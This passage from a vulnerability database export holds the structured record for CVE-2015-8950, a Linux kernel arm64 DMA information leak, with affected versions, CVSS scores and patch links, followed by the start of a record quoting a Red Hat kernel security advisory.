        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "p9 eva-cl10c00b192",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "p9 eva-al10c00b193",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "p9 eva-al10c00b192",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "p9 eva-dl10c00b193",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.3,
        "vendor": "google",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "93318"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8950"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.0.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-8950"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hang Zhang, Dongdong She, and Zhiyun Qian of UC Riverside",
    "sources": [
      {
        "db": "BID",
        "id": "93318"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2015-8950",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2015-8950",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2015-8950",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-8950",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201610-157",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-8950",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8950"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8950"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arch/arm64/mm/dma-mapping.c in the Linux kernel before 4.0.3, as used in the ION subsystem in Android and other products, does not initialize certain data structures, which allows local users to obtain sensitive information from kernel memory by triggering a dma_mmap call. Linux Kernel is prone to an information disclosure vulnerability. \nAn attacker can exploit this issue to obtain sensitive information; information obtained may aid in other attacks",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-8950"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "db": "BID",
        "id": "93318"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8950"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-8950",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "93318",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8950",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8950"
      },
      {
        "db": "BID",
        "id": "93318"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8950"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ]
  },
  "id": "VAR-201610-0041",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.58483934
  },
  "last_update_date": "2023-12-18T14:05:56.321000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-October 2016",
        "trust": 0.8,
        "url": "http://source.android.com/security/bulletin/2016-10-01.html"
      },
      {
        "title": "ChangeLog-4.0.3",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v4.x/changelog-4.0.3"
      },
      {
        "title": "arm64: dma-mapping: always clear allocated buffers",
        "trust": 0.8,
        "url": "https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=6e2c437a2d0a85d90d3db85a7471f99764f7bbf8"
      },
      {
        "title": "arm64: dma-mapping: always clear allocated buffers",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/6829e274a623187c24f7cfc0e3d35f25d087fcc5"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "arm64: dma-mapping: always clear allocated buffers",
        "trust": 0.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6829e274a623187c24f7cfc0e3d35f25d087fcc5"
      },
      {
        "title": "Android Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=64562"
      },
      {
        "title": "Red Hat: CVE-2015-8950",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-8950"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=66399e39e6fd5b04e559a1f773ff4e37"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8950"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8950"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://source.android.com/security/bulletin/2016-10-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6829e274a623187c24f7cfc0e3d35f25d087fcc5"
      },
      {
        "trust": 1.7,
        "url": "http://www.kernel.org/pub/linux/kernel/v4.x/changelog-4.0.3"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/torvalds/linux/commit/6829e274a623187c24f7cfc0e3d35f25d087fcc5"
      },
      {
        "trust": 1.7,
        "url": "https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=6e2c437a2d0a85d90d3db85a7471f99764f7bbf8"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/93318"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8950"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8950"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.3,
        "url": "https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=6e2c437a2d0a85d90d3db85a7471f99764f7bbf8 "
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161026-02-smartphone-en"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8950"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8950"
      },
      {
        "db": "BID",
        "id": "93318"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8950"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8950"
      },
      {
        "db": "BID",
        "id": "93318"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8950"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-10-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-8950"
      },
      {
        "date": "2016-10-03T00:00:00",
        "db": "BID",
        "id": "93318"
      },
      {
        "date": "2016-10-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "date": "2016-10-10T10:59:01.260000",
        "db": "NVD",
        "id": "CVE-2015-8950"
      },
      {
        "date": "2016-10-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-11-28T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-8950"
      },
      {
        "date": "2016-11-24T11:03:00",
        "db": "BID",
        "id": "93318"
      },
      {
        "date": "2016-10-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      },
      {
        "date": "2016-11-28T19:50:45.630000",
        "db": "NVD",
        "id": "CVE-2015-8950"
      },
      {
        "date": "2016-10-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Android Of products such as  ION Used in subsystem  Linux Kernel Vulnerability in which important information is obtained",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007276"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-157"
      }
    ],
    "trust": 0.6
  }
}

var-201909-1527
Vulnerability from variot

There is heap-based buffer overflow in Linux kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. Linux Kernel Contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel-alt security and bug fix update Advisory ID: RHSA-2020:0174-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:0174 Issue date: 2020-01-21 CVE Names: CVE-2018-3693 CVE-2018-18559 CVE-2019-3846 CVE-2019-8912 CVE-2019-10126 CVE-2019-11487 CVE-2019-14814 CVE-2019-14815 CVE-2019-14816 CVE-2019-17133 CVE-2019-18660 ==================================================================== 1. Summary:

An update for kernel-alt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, noarch, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, noarch, ppc64le

Security Fix(es):

  • Kernel: speculative bounds check bypass store (CVE-2018-3693)

  • kernel: Use-after-free due to race condition in AF_PACKET implementation (CVE-2018-18559)

  • kernel: Heap overflow in mwifiex_update_bss_desc_with_ie function in marvell/mwifiex/scan.c (CVE-2019-3846)

  • kernel: af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in sockfs_setattr (CVE-2019-8912)

  • kernel: Heap overflow in mwifiex_uap_parse_tail_ies function in drivers/net/wireless/marvell/mwifiex/ie.c (CVE-2019-10126)

  • kernel: Count overflow in FUSE request leading to use-after-free issues.

Bug Fix(es):

  • Kernel panic on job cleanup, related to SyS_getdents64 (BZ#1702057)

  • Kernel modules generated incorrectly when system is localized to non-English language (BZ#1705285)

  • RHEL-Alt-7.6 - Fixup tlbie vs store ordering issue on POWER9 (BZ#1756270)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1581650 - CVE-2018-3693 Kernel: speculative bounds check bypass store 1641878 - CVE-2018-18559 kernel: Use-after-free due to race condition in AF_PACKET implementation 1678685 - CVE-2019-8912 kernel: af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in sockfs_setattr 1703063 - CVE-2019-11487 kernel: Count overflow in FUSE request leading to use-after-free issues. Package List:

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):

Source: kernel-alt-4.14.0-115.17.1.el7a.src.rpm

